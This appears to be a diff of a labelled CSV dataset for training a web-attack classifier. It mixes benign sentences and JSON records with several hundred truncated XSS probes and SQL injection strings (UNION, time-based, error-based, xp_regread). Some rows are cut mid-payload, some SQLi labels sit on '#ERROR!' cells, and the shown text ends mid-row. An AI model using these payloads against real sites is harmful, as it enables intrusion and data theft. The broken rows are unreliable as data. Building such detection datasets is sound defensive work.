1=1/*",2,SQLi,9934 -select * from pg_group;,2,SQLi,22514 -<bdi onpointermove=alert(1)>XSS</bdi>,1,XSS,2652 -Select the perfect outfit for an event.,0,normal,24140 -Select the best route for your commute.,0,normal,24019 -Restricted governance committee meets to select he,0,normal,25749 -Select your contemplate.,0,normal,24972 -"<figure ondblclick=""alert(1)"">test</figure>",1,XSS,7147 +"<acronym oncontextmenu=""alert(1)"">test</acronym>",1,XSS,4086 +"<html draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,2879 +1 where 6173 = 6173,2,SQLi,21010 +"admin"") or (""1""=""1""--",2,SQLi,9936 +Select your signal.,0,normal,24899 +"<picture draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2653 +Select a recipe to create in the kitchen.,0,normal,24137 +Select a language to learn.,0,normal,24016 +Riders in select cities will be invited to partici,0,normal,25746 +Select your wonder.,0,normal,24969 +<listing onfocusout=alert(1) tabindex=1 id=x></lis,1,XSS,7149 "<form><button formaction=""javascript:alert(XSS)"">l",1,XSS,958 -"<strong draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,2111 -<col onpointerout=alert(1)>XSS</col>,1,XSS,5109 -Select shoot.,0,normal,24666 -"SRC=""javascript:alert('')",1,XSS,7632 -"{""id"":null,""name"":""amount""}",0,normal,27010 -Why did you select the article and performer you d,0,normal,25125 -select,0,normal,26567 -I want to select a course for professional develop,0,normal,23698 -Save up to 30% off select Simple Modern water bott,0,normal,25717 -select ( case when ( 9318 = 7198 ) then 9318 else ,2,SQLi,13536 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20",2,SQLi,10961 -"select sleep ( 5 ) and ""irxg"" = ""irxg",2,SQLi,20425 -"<thead onmousemove=""alert(1)"">test</thead>",1,XSS,8848 -"1 ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x717",2,SQLi,12912 -Select your grow.,0,normal,25031 -Select link.,0,normal,23095 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,20300 -1' ) as cdrm where 4595 = 4595 order by 1#,2,SQLi,18534 -"1%"" ) ) ) and 9254 = ( select count ( * ) from rdb",2,SQLi,17854 -pg_SLEEP(5)#,2,SQLi,10392 -<tbody onpointermove=alert(1)>XSS</tbody>,1,XSS,4641 -"<tfoot draggable=""true"" ondrag=""alert(1)"">test</tf",1,XSS,2400 -<dd onpointermove=alert(1)>XSS</dd>,1,XSS,7311 -1 ) as eryo where 2531 = 2531 rlike sleep ( 5 ) --,2,SQLi,17277 -Select the best option from the list.,0,normal,24065 -"x' AND members.email IS NULL,",2,SQLi,12001 -1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,14025 -I'll select a new painting to hang in the living r,0,normal,23906 -<button onDataAvailable=javascript:alert(1)>,1,XSS,9598 -Plant some fragrant herbs in your garden.,0,normal,22938 -<style>:target {color:red;}</style><keygen id=x st,1,XSS,2626 -"-7395%"" order by 1--",2,SQLi,21611 -AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(7,2,SQLi,11341 -"<style>@keyframes x{}</style><keygen style=""animat",1,XSS,3347 -"1"" ) as bpmk where 6412 = 6412 union all select nu",2,SQLi,15836 -1' in boolean mode ) and 3754 = ( select upper ( x,2,SQLi,19275 -"<fieldset draggable=""true"" ondragleave=""alert(1)"">",1,XSS,8298 -><link rel=import href=data:text/html&comma;&lt;sc,1,XSS,8960 -"1' ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,16461 -I want to select the perfect spot for the picnic.,0,normal,23671 -"<style>@keyframes x{}</style><frameset style=""anim",1,XSS,6652 -<svg onunload=window.open('javascript:alert(1)')>,1,XSS,4948 -"-6731"" where 6166 = 6166 union all select 6166,616",2,SQLi,20203 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10453 -1 or 8421 = ( select count ( * ) from generate_ser,2,SQLi,16219 -or 1=1,2,SQLi,9968 -1' ) ) ) and 7533 = 7533 and ( ( ( 'hoyw' = 'hoyw,2,SQLi,19859 -"1' ) ) procedure analyse ( extractvalue ( 9255,con",2,SQLi,21029 -<xss onpointerup=alert(1) style=display:block>XSS<,1,XSS,94 -"-2230%"" union all select 3303,3303,3303--",2,SQLi,17254 -<rb id=x tabindex=1 onfocus=alert(1)></rb>,1,XSS,7172 -"<ins onmouseover=""alert(1)"">test</ins>",1,XSS,6792 -"<div id=""63""><embed src=""javascript:alert(63)""></e",1,XSS,9140 +"<rp draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,2112 +<embed onpointerenter=alert(1)>XSS</embed>,1,XSS,5111 +"-4929"" where 6381 = 6381 or 8571 = 8571--",2,SQLi,22378 +"<ol onkeyup=""alert(1)"" contenteditable>test</ol>",1,XSS,7634 +"{""id"":null,""firstName"":""Wailin"",""lastName"":""Yan"",""",0,normal,27007 +Why should we leave it to Harper & Brothers and Re,0,normal,25122 +select,0,normal,26564 +I want to select a playlist for my road trip.,0,normal,23695 +1' ) where 6624 = 6624 and 5392 = 8258,2,SQLi,21324 +1 where 7224 = 7224 and sleep ( 5 ) #,2,SQLi,13538 +#ERROR!,2,SQLi,10963 +"Protune remains with some small tweaks New ""linear",0,normal,25760 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8850 +1' or exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,12914 +Select your climb.,0,normal,25028 +Select movie.,0,normal,23092 +-2022 ) ) ) or 6812 = 3516 and ( ( ( 3896 = 3896,2,SQLi,20298 +1%' or 8315 = ( select count ( * ) from sysibm.sys,2,SQLi,18532 +"1%"" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ",2,SQLi,17856 +or pg_SLEEP(5)#,2,SQLi,10394 +"<IMG LOWSRC=""javascript:alert('')"">",1,XSS,4643 +<image onblur=alert(1) tabindex=1 id=x></image><in,1,XSS,2401 +<applet id=x tabindex=1 onfocus=alert(1)></applet>,1,XSS,7313 +1'|| ( select 'skds' from dual where 8594 = 8594 a,2,SQLi,17279 +Select a book to read on the journey.,0,normal,24062 +select * from users where id = '1' <@._ union sele,2,SQLi,12003 +"1"" ) where 2680 = 2680 or elt ( 5873 = 5873,sleep ",2,SQLi,14027 +Where should we meet for our date?,0,normal,22965 +<button onDataSetComplete=javascript:alert(1)>,1,XSS,9600 +Filter the spam calls on your phone.,0,normal,22935 +"<style>@keyframes x{}</style><tbody style=""animati",1,XSS,2627 +"{""id"":null,""firstName"":""Han Jie"",""lastName"":""Kwong",0,normal,27114 +) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR,2,SQLi,11343 +"<style>@keyframes slidein {}</style><bdo style=""an",1,XSS,3349 +1' ) ) and ( select 2* ( if ( ( select * from ( se,2,SQLi,15838 +"1 ) union all select null,null,null,null,null,null",2,SQLi,19273 +<tr id=x tabindex=1 onfocus=alert(1)></tr>,1,XSS,8300 +><script src=data:&comma;alert(1)//,1,XSS,8962 +select ( case when ( 3217 = 8421 ) then 3217 else ,2,SQLi,16463 +1' and 6537 = dbms_pipe.receive_message ( chr ( 76,2,SQLi,21420 +"<style>@keyframes slidein {}</style><samp style=""a",1,XSS,6654 +<small id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,4950 +"1"" ) ) ) and make_set ( 6751 = 8128,8128 ) and ( (",2,SQLi,20201 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10455 +1' ) where 9538 = 9538,2,SQLi,16221 +or 1=1 –,2,SQLi,9970 +1' ) ) as ijyi where 3694 = 3694 ( select ( case w,2,SQLi,18172 +"1%"" ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,21027 +<xss onpointerup=alert(1) style=display:block>XSS<,1,XSS,94 +"-4418"" or 6872 = 6872 and ""gbut"" = ""gbut",2,SQLi,17256 +"<meter onmousedown=""alert(1)"">test</meter>",1,XSS,7174 +"<cite ondblclick=""alert(1)"">test</cite>",1,XSS,6794 +"<div id=""66""><?xml version=""1.0""?>",1,XSS,9142 "{""id"":null,""name"":""Sistermon Blanc""}",0,normal,27514 -The legislative bodies are the select and common c,0,normal,25417 -Insert ink.,0,normal,22812 -<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot>,1,XSS,7845 --2181' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,16332 -"1"" ) rlike ( select ( case when ( 7689 = 7689 ) th",2,SQLi,20012 -"<form ondblclick=""alert(1)"">test</form>",1,XSS,1886 -Select a program to watch online.,0,normal,24198 -1 ) ) as cusv where 4871 = 4871 and elt ( 1210 = 1,2,SQLi,12787 -"<dfn onmouseup=""alert(1)"">test</dfn>",1,XSS,5774 -1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ,2,SQLi,18096 -"<tt ondblclick=""alert(1)"">test</tt>",1,XSS,8191 -"1"" ) ) as casz where 5921 = 5921 rlike ( select * ",2,SQLi,18805 +1'+ ( select vxax where 9036 = 9036 and elt ( 1210,2,SQLi,20683 +Create a poem.,0,normal,22809 +"<menuitem draggable=""true"" ondragend=""alert(1)"">te",1,XSS,7847 +1' ) ) as cgey where 2130 = 2130 and make_set ( 79,2,SQLi,16334 +"1"" ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,20010 +<image srcset=1 onerror=alert(1)>,1,XSS,1887 +Select a workout routine to stay fit.,0,normal,24195 +"-5204"" ) union all select 7186,7186,7186--",2,SQLi,12789 +"<output onmouseleave=""alert(1)"">test</output>",1,XSS,5776 +"{""id"":null,""name"":""gain""}",0,normal,27365 +"<code draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,8193 +Can you help me decide where to go for a walk?,0,normal,23837 "<style>@keyframes x{}</style><xss style=""animation",1,XSS,3 --5698' ) ) as egjr where 5586 = 5586 union all sel,2,SQLi,16092 -"<var onclick=""alert(1)"">test</var>",1,XSS,2760 -"-7815' union all select 2638,2638,2638,2638,2638--",2,SQLi,20002 -Select product.,0,normal,24553 -select case when 1574 = 5523 then 1 else null end-,2,SQLi,12223 -[a](javascript:this;alert(1&#41;),1,XSS,9426 -Or select a Medicare Advantage plan that includes ,0,normal,25803 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7850 -<summary onpointerover=alert(1)>XSS</summary>,1,XSS,3176 -1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240,2,SQLi,21275 -1 ) ) and 3228 = 7376#,2,SQLi,15670 -select ( case when ( 3336 = 9781 ) then 3336 else ,2,SQLi,16305 -<acronym onpointerleave=alert(1)>XSS</acronym>,1,XSS,2466 -select,0,normal,26610 -"1"" ) where 4739 = 4739 or ( select 2* ( if ( ( sel",2,SQLi,14275 -To see the final sculptures from this studio scene,0,normal,25258 -"-1907"" ) ) or 2782 = 3591",2,SQLi,15613 -"-4319"" ) where 7534 = 7534 or 8246 = 3217",2,SQLi,19518 -"<video autoplay onplay=alert(1)><source src=""valid",1,XSS,2512 --2936 ) or 6872 = 6872,2,SQLi,15249 --4104%' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,22172 -"1"" ) ) rlike ( select * from ( select ( sleep ( 5 ",2,SQLi,20869 -<sub onfocusout=alert(1) tabindex=1 id=x></sub><in,1,XSS,3622 -"<q draggable=""true"" ondragenter=""alert(1)"">test</q",1,XSS,2318 -"<element onclick=""alert(1)"">test</element>",1,XSS,7087 -"<dialog onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,4478 -or 3=3,2,SQLi,10083 -"exp/*<A STYLE='no\xss:noxss(""*//*"");",1,XSS,1156 -<q id=x tabindex=1 onbeforedeactivate=alert(1)></q,1,XSS,2487 -"Instead, they're looking to help out a select grou",0,normal,25979 -1,0,normal,26689 -"<main draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,3228 -1'|| ( select 'goxu' where 9215 = 9215 and char ( ,2,SQLi,15016 -1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,13542 -<th id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,4393 -"-1802%' ) ) union all select 1002,1002,1002,1002,1",2,SQLi,20824 -"<noscript onclick=""alert(1)"">test</noscript>",1,XSS,8873 -Where's the hacienda?,0,normal,23572 -"<nextid draggable=""true"" ondrag=""alert(1)"">test</n",1,XSS,2192 -"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb",2,SQLi,9922 -<p onblur=alert(1) tabindex=1 id=x></p><input auto,1,XSS,8002 -"-6599"" ) ) union all select 2870,2870,2870,2870,28",2,SQLi,20433 -<canvas onpointerenter=alert(1)>XSS</canvas>,1,XSS,6669 -"1"" ) ) ) or 5356 = ( select count ( * ) from sysus",2,SQLi,13359 -<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt,1,XSS,8164 -"1 ) procedure analyse ( extractvalue ( 5840,concat",2,SQLi,17065 --9564 or 4144 = ( select upper ( xmltype ( chr ( 6,2,SQLi,12819 -<map onfocusout=alert(1) tabindex=1 id=x></map><in,1,XSS,5910 -1'+ ( select 'dbvq' where 2045 = 2045 or 8514 = be,2,SQLi,22366 -"{""id"":null,""firstName"":""Anna"",""lastName"":""Tan"",""ad",0,normal,27325 -select ( case when ( 8601 = 1220 ) then 8601 else ,2,SQLi,21525 -"1"" ) as rgbz where 6687 = 6687 and 2716 = ( select",2,SQLi,19496 -Select the ideal gift for a friend.,0,normal,24159 -"<summary onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,7321 -"-7233"" ) where 7574 = 7574 or 5821 = 3288",2,SQLi,14143 -"{""id"":null,""name"":""gradually""}",0,normal,26860 -"<table draggable=""true"" ondrag=""alert(1)"">test</ta",1,XSS,5299 -"-2125"" ) ) or 8571 = 8571--",2,SQLi,19920 -"<shadow onkeypress=""alert(1)"" contenteditable>test",1,XSS,4241 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19867 -1' ) ) or 8315 = ( select count ( * ) from sysibm.,2,SQLi,13935 -select ( case when ( 8234 = 2498 ) then 8234 else ,2,SQLi,16206 -"<pre oncopy=""alert(1)"" contenteditable>test</pre>",1,XSS,7613 -&#0060;,1,XSS,9770 -"1' where 8451 = 8451 union all select null,null,nu",2,SQLi,18523 -x' AND userid IS NULL; --,2,SQLi,10142 -Where's the best place to watch the stars?,0,normal,23820 -"<xmp oncontextmenu=""alert(1)"">test</xmp>",1,XSS,2890 -1'+ ( select 'wyed' where 9896 = 9896,2,SQLi,21017 +1'|| ( select 'sbip' from dual where 7302 = 7302 a,2,SQLi,16094 +"<style>@keyframes x{}</style><frame style=""animati",1,XSS,2761 +"-1123' ) ) ) union all select 6735,6735,6735,6735,",2,SQLi,20000 +1'+ ( select 'epza' where 8994 = 8994 and make_set,2,SQLi,18393 +"-4785"" ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,12225 +[a](Javas&#99;ript:alert(1&#41;),1,XSS,9428 +The Invitation is playing in select theaters and e,0,normal,25423 +"<style>@keyframes x{}</style><embed style=""animati",1,XSS,7852 +"<h1 ondblclick=""alert(1)"">test</h1>",1,XSS,3178 +"-5082 ) ) union all select 4013,4013,4013,4013,401",2,SQLi,21273 +1 and ( select * from ( select ( sleep ( 5 ) ) ) g,2,SQLi,15672 +"1%' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745",2,SQLi,16307 +<video onpointerout=alert(1)>XSS</video>,1,XSS,2467 +Select wine.,0,normal,23059 +"1"" ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,14277 +"To set them as your wallpaper, save the photo at f",0,normal,25255 +"iif ( 2869 = 9448,1,1/0 )",2,SQLi,15615 +"-8073 ) ) ) union all select 4481,4481,4481,4481--",2,SQLi,19516 +<table onpointerover=alert(1)>XSS</table>,1,XSS,2513 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,15251 +Join the yoga class.,0,normal,22710 +1%' ) and 9254 = ( select count ( * ) from rdb$fie,2,SQLi,22342 +<bgsound id=x tabindex=1 onactivate=alert(1)></bgs,1,XSS,3624 +<article onpointerover=alert(1)>XSS</article>,1,XSS,2319 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7089 +"<link onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,4480 +a' waitfor delay '0:0:10'--,2,SQLi,10085 +"xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>",1,XSS,1157 +<li onpointerdown=alert(1)>XSS</li>,1,XSS,2488 +Investors will be watching the biggest U.S.-based ,0,normal,25976 +"-8358' ) ) ) union all select 7282,7282--",2,SQLi,20281 +"<object oncut=""alert(1)"" contenteditable>test</obj",1,XSS,3230 +"1"" ) as hoiv where 9708 = 9708 and exp ( ~ ( selec",2,SQLi,15018 +"1"" and 6537 = dbms_pipe.receive_message ( chr ( 76",2,SQLi,13544 +"<address draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,4395 +"No bishop or archdeacon "" shall any longer hold pl",0,normal,25867 +"<hgroup onmouseout=""alert(1)"">test</hgroup>",1,XSS,8875 +Where's the chateau?,0,normal,23569 +"<hgroup onkeyup=""alert(1)"" contenteditable>test</h",1,XSS,2193 +"admin"" #",2,SQLi,9924 +"<data ondblclick=""alert(1)"">test</data>",1,XSS,8004 +"1' in boolean mode ) and make_set ( 8403 = 8403,88",2,SQLi,20431 +<style>:target {color:red;}</style><dt id=x style=,1,XSS,6671 +1%' ) and 4061 = 2730#,2,SQLi,13361 +<style>:target {color:red;}</style><link id=x styl,1,XSS,8166 +"-9451"" ) ) ) union all select 4211,4211,4211,4211,",2,SQLi,17067 +1'+ ( select ohqr where 5610 = 5610,2,SQLi,12821 +"<meter onclick=""alert(1)"">test</meter>",1,XSS,5912 +"{""id"":null,""firstName"":""Ct"",""lastName"":""Ctyan"",""ad",0,normal,27388 +"{""id"":null,""name"":""Gigalith""}",0,normal,27324 +Investors seeking exposure to those sectors can ge,0,normal,25977 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19494 +Select your dispute.,0,normal,24911 +"<dir onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,7323 +"1 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14145 +"1' ) and make_set ( 6488 = 5525,5525 )",2,SQLi,22004 +"<area oncopy=""alert(1)"" contenteditable>test</area",1,XSS,5301 +"By late February, more Yeezys were released throug",0,normal,26299 +"<form oncut=""alert(1)"" contenteditable>test</form>",1,XSS,4243 +"1%"" ) and 3707 = ( select count ( * ) from sysibm.",2,SQLi,19865 +1%' or 2367 = ( select count ( * ) from rdb$fields,2,SQLi,13937 +"iif ( 1878 = 2513,1,1/0 )",2,SQLi,16208 +<nobr id=x tabindex=1 onfocusin=alert(1)></nobr>,1,XSS,7615 +&#000060;,1,XSS,9772 +"-1055' union all select 7758,7758,7758,7758,7758,7",2,SQLi,18521 +(select top 1,2,SQLi,10144 +I'll select a movie for us to watch together.,0,normal,23817 +<del onpointerdown=alert(1)>XSS</del>,1,XSS,2891 +1' ) or 5286 = ( select count ( * ) from all_users,2,SQLi,21015 "<embed type=""image"" src=%(scriptlet)s></embed>",1,XSS,789 -1' ) ) as uvxv where 6663 = 6663 and 8514 = ( sele,2,SQLi,19842 -"-9163"" union all select 3820,3820,3820,3820,3820,3",2,SQLi,21006 -"1' ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7",2,SQLi,18576 -"1', ( select ( case when ( 8596 = 8596 ) then 1 el",2,SQLi,13637 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3402 -"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,18180 -<object onpointermove=alert(1)>XSS</object>,1,XSS,3378 -1' ) ) as wjfj where 3802 = 3802,2,SQLi,21864 +1'+ ( select 'gprq' where 8928 = 8928,2,SQLi,21467 +1'+ ( select 'tyuz' where 3957 = 3957 or char ( 68,2,SQLi,21004 +-4901 ) or 3407 = 6442#,2,SQLi,18574 +"1"" where 9014 = 9014 and 6969 = ( select 6969 from",2,SQLi,13639 +"<xmp onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3404 +1' in boolean mode ) or ( select 2* ( if ( ( selec,2,SQLi,18178 +"<abbr onmouseleave=""alert(1)"">test</abbr>",1,XSS,3380 +"1"" ) as kuuf where 6908 = 6908",2,SQLi,21862 `'><script>\xEF\xBF\xBEjavascript:alert(1)</script,1,XSS,584 -or 1=1#,2,SQLi,9973 -1 ) as jdhz where 2021 = 2021,2,SQLi,16734 -"-4807' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,18309 -"1"" ) and 3580 = ( select count ( * ) from domain.d",2,SQLi,19280 -"-1807' ) ) union all select 9853,9853,9853,9853,98",2,SQLi,15198 -"1' ) and 4241 = convert ( int, ( select char ( 113",2,SQLi,13898 -"{""id"":null,""name"":""Sandile""}",0,normal,27304 +) or '1'='1,2,SQLi,9975 +"1"" ) where 9223 = 9223 and exp ( ~ ( select * from",2,SQLi,16736 +1 ) where 4548 = 4548 and 9198 = 9198--,2,SQLi,18307 +"{""id"":null,""firstName"":""Ros"",""lastName"":""Probo"",""a",0,normal,26879 +1'+ ( select 'rajp' where 3300 = 3300,2,SQLi,15200 +1'|| ( select 'ejuu' from dual where 2903 = 2903 a,2,SQLi,13900 +Use the checkboxes along the left side of Amazon's,0,normal,25197 <IMG SRC=javascript:alert('XSS')>,1,XSS,802 -Investors will be watching the biggest U.S.-based ,0,normal,25976 -<form>,1,XSS,9174 -select * from users where id = '1' <@&1 union sele,2,SQLi,11651 -"1%"" union all select null,null,null,null,null,null",2,SQLi,18542 -"<audio onmouseleave=""alert(1)"">test</audio>",1,XSS,5174 -"<section onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,6500 -1%' ) or 4915 = ( select count ( * ) from domain.d,2,SQLi,20292 -1 ) ) ) and 8189 = ( select count ( * ) from sysib,2,SQLi,16257 -"-3377"" ) or 4982 = 6608#",2,SQLi,20889 -select ( case when ( 5914 = 2314 ) then 5914 else ,2,SQLi,17353 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,12848 -"<option onmousemove=""alert(1)"">test</option>",1,XSS,7710 -"<menu draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,6854 -"<style onmouseover=""alert(1)"">test</style>",1,XSS,2757 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6459 -Typical usage would be to allow a user to select a,0,normal,25230 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14856 -1' ) ) as vwua where 8099 = 8099 union all select ,2,SQLi,12810 -1'+ ( select uhsy where 4596 = 4596 and ( select *,2,SQLi,14793 -1' ) ) as prxm where 1267 = 1267 and 3580 = ( sele,2,SQLi,13807 -"-8203"" ) union all select 6394,6394,6394,6394,6394",2,SQLi,18001 -"<xmp oncut=""alert(1)"" contenteditable>test</xmp>",1,XSS,6943 -"Abstraction differs from Analysis, inasmuch as its",0,normal,26414 -"<marquee draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2171 -"-4746%"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ",2,SQLi,21738 -"<br draggable=""true"" ondrag=""alert(1)"">test</br>",1,XSS,5088 -select * from users where id = 1 +1 or 1 = 1 -- 1,2,SQLi,12060 -"select * from generate_series ( 4975,4975,case whe",2,SQLi,21787 -<br onpointermove=alert(1)>XSS</br>,1,XSS,8078 -"Ahead, enjoy a few select photos of the magical ev",0,normal,26394 -"{""id"":null,""name"":""height fierce""}",0,normal,27194 -"<style>@keyframes x{}</style><picture style=""anima",1,XSS,5616 -"-2256"" ) ) ) or 1971 = 4537#",2,SQLi,13847 -#ERROR!,2,SQLi,10975 -"{""id"":null,""firstName"":""Ann"",""lastName"":""Ang"",""spe",0,normal,26788 -1' ) ) rlike ( select ( case when ( 8489 = 8820 ) ,2,SQLi,16113 -1' ) where 3311 = 3311,2,SQLi,19037 -1' ) where 9175 = 9175,2,SQLi,13445 -"1%"" ) order by 1#",2,SQLi,13825 -"-8026 or elt ( 8434 = 4516,4516 ) # bsqo",2,SQLi,13377 -declare @q nvarchar (200) 0x730065006c00650063 ...,2,SQLi,10068 -\x1Cjavascript:javascript:confirm(1),1,XSS,9482 -"<style>@keyframes x{}</style><command style=""anima",1,XSS,2402 -"<keygen onmouseover=""alert(1)"">test</keygen>",1,XSS,8112 --4082 ) ) or 5903 = ( 'qqpjq'|| ( select case 5903,2,SQLi,12398 -"1"" ) where 3727 = 3727 and 4241 = convert ( int, (",2,SQLi,19826 -1' rlike ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,15703 -(SELECT SLEEP(5)),2,SQLi,11140 -"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTY",1,XSS,1703 -1' ) ) as kgiw where 7452 = 7452 and 6510 = ( sele,2,SQLi,19359 -<area onblur=alert(1) tabindex=1 id=x></area><inpu,1,XSS,5642 -1'|| ( select 'fpfl' from dual where 1434 = 1434 a,2,SQLi,22438 -"<script src=""#"">{alert(1)}</script>;1",1,XSS,1125 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4522 -select sleep ( 5 ) and ( ( ( 5552 = 5552,2,SQLi,15078 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,14440 -"1 where 7158 = 7158 or elt ( 5873 = 5873,sleep ( 5",2,SQLi,19127 -( case when 2646 = 8520 then 2646 else null end ),2,SQLi,13004 -<small onpointerup=alert(1)>XSS</small>,1,XSS,7765 +1' ) ) and ( 5091 = 8681 ) *8681 and ( ( 'xevm' = ,2,SQLi,20490 +<form><button formaction=javascript:alert(1)>click,1,XSS,9176 +", if is_srvrolemember ( 'sysadmin' ) > 0 waitfor d",2,SQLi,11653 +-4219' or 2724 in ( ( char ( 113 ) +char ( 113 ) +,2,SQLi,22250 +<time onpointermove=alert(1)>XSS</time>,1,XSS,5176 +"<isindex draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,6502 +"1, ( select ( case when ( 3743 = 9640 ) then 1 els",2,SQLi,20290 +"1"" ) ) or sleep ( 5 ) and ( ( ""mcyv"" = ""mcyv",2,SQLi,16259 +1' where 1692 = 1692,2,SQLi,21918 +"1"" ) ) ) or sleep ( 5 ) and ( ( ( ""hdis"" like ""hdi",2,SQLi,17355 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,12850 +"<style>@keyframes x{}</style><aside style=""animati",1,XSS,7712 +"<noscript onmouseout=""alert(1)"">test</noscript>",1,XSS,6856 +<style onpointerout=alert(1)>XSS</style>,1,XSS,2758 +"<big draggable=""true"" ondrag=""alert(1)"">test</big>",1,XSS,6461 +Under the title of Select Scottish Ballads he repr,0,normal,25227 +"1"" ) where 9570 = 9570 rlike ( select ( case when ",2,SQLi,14858 +"-2920"" ) ) as zdgv where 9702 = 9702 or 2724 in ( ",2,SQLi,12812 +-5580 or 4829 = 1968,2,SQLi,14795 +1' ) ) order by 1#,2,SQLi,13809 +"1"" ) ) ) or row ( 1045,7562 ) > ( select count ( *",2,SQLi,18003 +top[‘al\145rt’](1),1,XSS,6945 +"According to the legend, Gordium was founded by Go",0,normal,26411 +"<em oncontextmenu=""alert(1)"">test</em>",1,XSS,2172 +1 ) and ( select 2* ( if ( ( select * from ( selec,2,SQLi,21736 +"<em onkeyup=""alert(1)"" contenteditable>test</em>",1,XSS,5090 +"select * from users where id = 1 or ""\#"" or 1 = 1 ",2,SQLi,12062 +"1' and elt ( 4249 = 4249,7259 ) and 'awjd' = 'awjd",2,SQLi,21785 +"<iframe oncontextmenu=""alert(1)"">test</iframe>",1,XSS,8080 +select ( case when ( 4291 = 6937 ) then 4291 else ,2,SQLi,18519 +1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||,2,SQLi,19710 +"<dir draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,5618 +1 ) ) as nlzg where 1482 = 1482 procedure analyse ,2,SQLi,13849 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10977 +"{""id"":null,""name"":""certain""}",0,normal,26785 +"1"" ) union all select null,null#",2,SQLi,16115 +"-4905"" union all select 6082,6082--",2,SQLi,19035 +1'+ ( select 'lpkv' where 8760 = 8760,2,SQLi,13447 +"-8844"" ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,13827 +"1"" ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ",2,SQLi,13379 +; exec xp_regread,2,SQLi,10070 +\xE2\x80\x85javascript:javascript:confirm(1),1,XSS,9484 +"<col oncopy=""alert(1)"" contenteditable>test</col>",1,XSS,2403 +"<figure onmouseleave=""alert(1)"">test</figure>",1,XSS,8114 +-7648' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,12400 +"1, ( case when 2872 = 2872 then 1 else null end )",2,SQLi,19824 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,15705 +(select*from(select(sleep(5)))a),2,SQLi,11142 +"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTY",1,XSS,1704 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,19538 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5644 +Select a camera for the photography.,0,normal,24008 +"<script>crypto.generateCRMFRequest('CN=0',0,0,null",1,XSS,1126 +<style>@keyframes slidein {}</style><listing style,1,XSS,4524 +"1%"" ) or 8315 = ( select count ( * ) from sysibm.s",2,SQLi,15080 +"1%"" ) ) and 4386 = utl_inaddr.get_host_address ( c",2,SQLi,14442 +He is entitled to consecrate all the bishops withi,0,normal,26118 +1' ) ) ) and 3754 = ( select upper ( xmltype ( chr,2,SQLi,13006 +<address id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,7767 +"1' ) ) and row ( 